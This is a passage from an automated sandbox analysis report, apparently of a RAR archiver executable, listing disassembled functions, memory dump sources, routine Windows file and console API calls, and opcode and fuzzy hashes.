                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4141822043-0
                                                                                                                                                                                                                                            • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                            • Instruction ID: 2497d6a8d806a1584c8d40d5280e41bac2b50d7bd5217d7cfe9af93e9504cd78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0E0CD11F0850363FF54B7615C55136CA519F49780FD01034D81F8E390DF5CD489C320
                                                                                                                                                                                                                                            Function 00007FF702C24044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4052775200-0
                                                                                                                                                                                                                                            • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                            • Instruction ID: 95c40d3d83dc574e6dd04171d3e171782771db1154e56827ceaf15e73b878dfc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFE1C223A08682A6EB34AB24DC401BFEAA0FF51794F844131DB9D476D9DFBCE489C710
                                                                                                                                                                                                                                            Function 00007FF702C21AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF702C17EBE,00000000,00000000,00000000,00000000,00000007,00007FF702C17C48), ref: 00007FF702C21B8D
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF702C17EBE,00000000,00000000,00000000,00000000,00000007,00007FF702C17C48), ref: 00007FF702C21BD7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                            • Instruction ID: 84b2a9277c7422d2b1390eacb8b25b4196de3adfc7190582ee31fad628274c89
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F23139A3A1868556F730AF24D8053BAAAA0EF40B78F944334DD6C066C6DFFCC485C750
                                                                                                                                                                                                                                            Function 00007FF702C0681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 932687459-0
                                                                                                                                                                                                                                            • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                            • Instruction ID: 0833ba49eedcc4f04047d65ba260c89fcf54f5d02e53f2614a577693c50fc343
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F621A453D08F8592EB019F29D5810B96760FF9CB88B58A321DF8D4365AEF68E5E5C300
                                                                                                                                                                                                                                            Function 00007FF702C3915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 784165f73a5dee58fdb272d2981d7b5d67b9c1d468b1dc4f6242ca17e0923e90
                                                                                                                                                                                                                                            • Instruction ID: f43eb4245c392ed7a072a5cf961c2c87945837026d23d7980c7234dab2483c1b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 784165f73a5dee58fdb272d2981d7b5d67b9c1d468b1dc4f6242ca17e0923e90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88118132A09B8191EB00BB55ED003BAF6A8EF85790FA40634DA9D077E6DFB8D051C324
                                                                                                                                                                                                                                            Function 00007FF702C220B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                            • Instruction ID: 97173b36d74c84283b875a959e7cea870546bba2505799423900ddbbc2617841
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC012932A1869152EB64AB25ED0043AE651EF44BE0F945230DE2D43BD4CFBCE845C711
                                                                                                                                                                                                                                            Function 00007FF702C17A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • setbuf.LIBCMT ref: 00007FF702C17A7B
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C62AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF702C67EF3
                                                                                                                                                                                                                                            • setbuf.LIBCMT ref: 00007FF702C17A8F
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C17B44: GetStdHandle.KERNEL32(?,?,?,00007FF702C17A9E), ref: 00007FF702C17B4A
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C17B44: GetFileType.KERNELBASE(?,?,?,00007FF702C17A9E), ref: 00007FF702C17B56
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C17B44: GetConsoleMode.KERNEL32(?,?,?,00007FF702C17A9E), ref: 00007FF702C17B69
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C62ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF702C62AD0
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C62B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF702C62C1C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4044681568-0
                                                                                                                                                                                                                                            • Opcode ID: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
                                                                                                                                                                                                                                            • Instruction ID: 79804748043af8479713954f12a0c2534aa1e93feb752fade188c5cdaace44a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501B302E0918225FB18B2B55C6A3BBEC428F92310FC08179E92E0A3D3CF9C2445C37A
                                                                                                                                                                                                                                            Function 00007FF702C22440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                            • Instruction ID: 640f48e316d30b504f6b8b52a1bf5d73c018b90bfd8bdabb370dccbbef9f88b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D01C823A08642A1EB64FB29EC4437AAB50EF40778FA44331E53D011E5CFBCD58AC721
                                                                                                                                                                                                                                            Function 00007FF702C230C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000800,00007FF702C2305D,?,?,?,?,?,?,?,?,00007FF702C34126,?,?,?,?,00000800), ref: 00007FF702C230F0
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF702C34126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF702C23119
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                            • Instruction ID: a49ea9dcfbc74825fcfd0260f157693049bc201bdd0e902a54a6063ce87e2a79
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2F08122B1869152EB60AB25EC443AAA6A0AF48794F800531E99D83799CFACD584C710
                                                                                                                                                                                                                                            Function 00007FF702C4B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1175261203-0
                                                                                                                                                                                                                                            • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                            • Instruction ID: dae6fef5014e20a07cb9aab8ea5289a4a836df3886e9075ac84b6ce588bdda51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF0FF63B1898166FB70BB21EC153B7A764BF98784FC04131E98D82699DFACD644CB20
                                                                                                                                                                                                                                            Function 00007FF702C4BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1231390398-0
                                                                                                                                                                                                                                            • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                            • Instruction ID: 6fb1542fc945eec18c2891d7eb6113f0a3dd5db14ae47664a3ab7f0d5e9c6418
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
